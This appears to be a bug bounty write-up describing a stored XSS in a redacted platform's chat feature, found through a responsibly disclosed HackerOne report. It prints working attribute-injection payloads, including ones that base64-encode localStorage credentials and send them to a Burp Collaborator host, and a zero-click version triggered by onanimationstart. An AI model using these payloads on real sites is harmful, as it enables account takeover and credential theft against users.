How I managed to trigger XSS automatically to get critical account takeover
Hello everybody! This is my first medium post so I hope you like it.
This write up is about one of the best findings I ever had in HackerOne. The impact was critical because the XSS was stored and you could send it through a chat to any user leading to steal their credentials. So, let’s go!
This private program that we are going to call REDACTED.com has a chat to communicate with any user on the platform. Analyzing this feature I found that Javascript was parsing the URLs that I sent.
If I sent https://google.com, the chat parsed the text and it put the URL as a link in a “a” html tag:
So the first malicious payload that I sent was:
https://google.com"'/>And boom I saw how the HTML was broken:
Knowing this I tried to add new tags but unfortunately there were a lot of filters of html tags. After a while trying to add tags without success I started to add attributes on the “a” tag that allowed me to execute Javascript in the tag’s context.
In this part I hadn’t problems and I injected successfully an onclick=alert(1) a
attribute with the following payload:
https://google.com"onclick="alert('1')"a="having as result the following final tag:
<a href="https://google.com" onclick="alert(1)" a=""> And when the victim clicked the link the popup alert appeared.
IMPORTANT INFORMATION: User’s credentials are saved on localStorage, an attacker can steal them with the following javascript payload:
https://google.com"onclick="b=JSON.stringify(localStorage);c=btoa(b);i=new/**/Image;i.src='https://burpcollaborator.burpcollaborator.net?t='+c"a="To explain the payload above the javascript encodes the localStorage information in base64 and after that It send it to an attacker’s burp collaborator .
At this moment I have got a high severity vulnerability because I could take over any account but with user interaction.
As I wanted a critical vulnerability I started to research how to trigger the Javascript payload automatically. After a while I found one perfect solution using the Cross-Site Scripting Cheat Sheet from Port Swigger. I found that the following payload works on all browser without user interaction:
But the big problem was that I couldn’t inject new HTML tags to create the animation on ‘style’ tag.
How did I solve this problem?
I needed to find only one animation defined on REDACTED CSS. So I opened each of the CSS files loaded in site and I FOUND IT!
Now only I had to prepare the exploit:
https://google.com"onanimationstart="b=JSON.stringify(localStorage);c=btoa(b);i=new/**/Image;i.src=’https://burpcollaborator.burpcollaborator.net?t='+c"style="animation-name:Toastify__bounceOutRightwhere:
- I put the malicious javascript code on the onanimationstart attribute.
- I defined in tag’s style the animation found.
So when the attacker sends the malicious message through the chat and the victim opens it, the tag’s style is loaded, the event executes the code put in the onanimationstart attribute and automatically the attacker receives the victim’s credentials on their burp collaborator.
After testing it a lot I wrote the report and I submitted it.
The report was triaged in 2 days and resolved in 7 days with a 3000$ bounty.
Thanks for reading I hope this helps!
You can following me on twitter: https://twitter.com/c4rrilat0r.